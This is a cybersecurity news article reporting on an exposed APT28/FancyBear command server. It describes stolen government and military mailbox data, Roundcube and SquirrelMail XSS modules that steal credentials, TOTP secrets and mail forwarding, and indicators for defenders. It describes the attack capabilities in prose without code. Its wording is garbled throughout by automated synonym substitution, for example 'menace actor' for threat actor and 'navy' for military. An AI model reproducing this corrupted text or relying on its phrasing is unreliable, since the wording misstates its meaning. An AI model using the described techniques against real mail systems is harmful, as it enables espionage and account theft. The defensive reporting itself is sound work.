FancyBear’s newest operational safety failure has uncovered a stay Russian espionage server full of stolen credentials, 2FA secrets and techniques, and detailed perception into the continuing concentrating on of European authorities and navy networks.
The uncovered infrastructure, tied to APT28/FancyBear and beforehand reported by CERT‑UA and Hunt.io, reveals each the dimensions of the compromises and the carelessness of a menace actor typically described as “subtle.”
Researchers from Ctrl‑Alt‑Intel, constructing on Hunt.io’s “Operation Roundish” findings, recognized a second open listing on the identical C2 server at 203.161.50[.]145, hosted on Namecheap infrastructure.
This open listing contained C2 supply code, payloads, logs, and exfiltrated information, giving uncommon visibility into FancyBear operations from the attacker’s personal server.
Analysts discovered greater than 2,800 exfiltrated emails, over 240 credential units (together with TOTP 2FA secrets and techniques), round 140 persistent forwarding guidelines, and over 11,500 harvested contact addresses.
Sufferer mailboxes belonged to authorities and navy entities in Ukraine, Romania, Bulgaria, Greece, Serbia, and North Macedonia, together with regional Ukrainian prosecutors, the Romanian Air Pressure, and Greece’s Nationwide Defence Normal Workers.
A number of of those international locations are NATO members or are carefully aligned with NATO, aligning the concentrating on with Russia’s strategic curiosity in Ukraine‑associated navy logistics and assist.
FancyBear Server
CERT‑UA had already tied the identical IP handle, 203.161.50[.]145, to APT28 exercise in advisories from late 2024, protecting Roundcube exploitation and a ClickFix / pretend reCAPTCHA spear‑phishing chain.
Regardless of this public publicity, FancyBear continued to function from the identical server for roughly 500 days, into early 2026, contradicting the frequent assumption that APT infrastructure is shortly rotated as soon as burned.
Censys telemetry and Hunt.io captures present a number of open directories on port 8889 between January and March 2026, considered one of which was later discovered by Ctrl‑Alt‑Intel to host further tooling and logs.
The foundation trigger was a fundamental however important OPSEC mistake: leaving HTTP open directories uncovered whereas staging payloads and exfiltrated information.
- These dates are when Censys scanned & recognized open ports, however it’s very seemingly was open earlier than & after these instances
- This menace actor had a number of open-directories from January – March 2026, though every was on the port
8889
The open-directory scanned and archived by Hunt.io on thirteenth January 2026 10:41 UTC was positioned inside a completely different listing than the one mentioned by Ctrl-Alt-Intel.
This allowed defenders not solely to obtain the complete toolkit but in addition to look at marketing campaign evolution and operator habits in close to actual time as recordsdata and logs have been up to date.
The toolkit facilities on JavaScript payloads injected into Roundcube (and, in a newly documented variant, SquirrelMail) through XSS vulnerabilities. As soon as executed in a sufferer’s browser, the Roundcube payload (“employee.js” household) can silently:
- Establish the logged‑in consumer.
- Steal credentials utilizing hidden auto‑fill varieties and click on‑based mostly exfiltration.
- Bulk‑exfiltrate total Inbox and Despatched folders as .eml recordsdata.
- Load modular scripts so as to add Sieve forwarding guidelines, steal handle books, and extract TOTP secrets and techniques.
One module, keyTwoAuth.js, targets the twofactor_gauthenticator plugin to tug the TOTP seed and restoration codes instantly from the 2FA settings web page, then exfiltrates them in base64 kind.
C2 logs present a whole bunch of entries the place FancyBear efficiently captured legitimate TOTP secrets and techniques, successfully enabling lengthy‑time period bypass of 2FA protections on excessive‑worth mailboxes.
The phishing emails contained a hyperlink to the area docs.google.com.spreadsheets.d.1ip6eeakdebmwteh36vana4hu-glaeksstsht-boujdk.zhblz[.]com the place John Hammond’s reCAPTCHA Phish POC was used to ship Metasploit payloads with the C2 IP handle 203.161.50[.]145.
One other module, addRedirectMailBox.js, abuses Roundcube’s ManageSieve integration to create an at all times‑on forwarding rule that silently copies each incoming electronic mail to an attacker‑managed ProtonMail account, persisting even when the preliminary XSS path is closed.
Geopolitical and defensive implications
The sufferer set aligns carefully with states offering navy help, logistics, or coaching linked to Ukraine, together with Romania, Bulgaria, Greece, and Ukraine itself, supporting the view that concentrate on choice is pushed by regional navy relevance moderately than random opportunism.
The marketing campaign additionally overlaps with ESET’s beforehand reported “Operation RoundPress” and CERT‑UA’s ClickFix / pretend reCAPTCHA phishing operations, reinforcing the attribution to GRU‑linked APT28/FancyBear.
For defenders, this incident underlines a number of priorities: securing webmail platforms corresponding to Roundcube and SquirrelMail, disabling or hardening ManageSieve and dangerous plugins the place attainable, and monitoring for indicators like zhblz[.]com and 203.161.50[.]145.
Crucially, it reveals that even excessive‑finish state actors could make easy OPSEC errors creating uncommon home windows the place defenders can see, and disrupt, espionage operations from the within.
Observe us on Google Information, LinkedIn, and X to Get Immediate Updates and Set GBH as a Most well-liked Supply in Google.
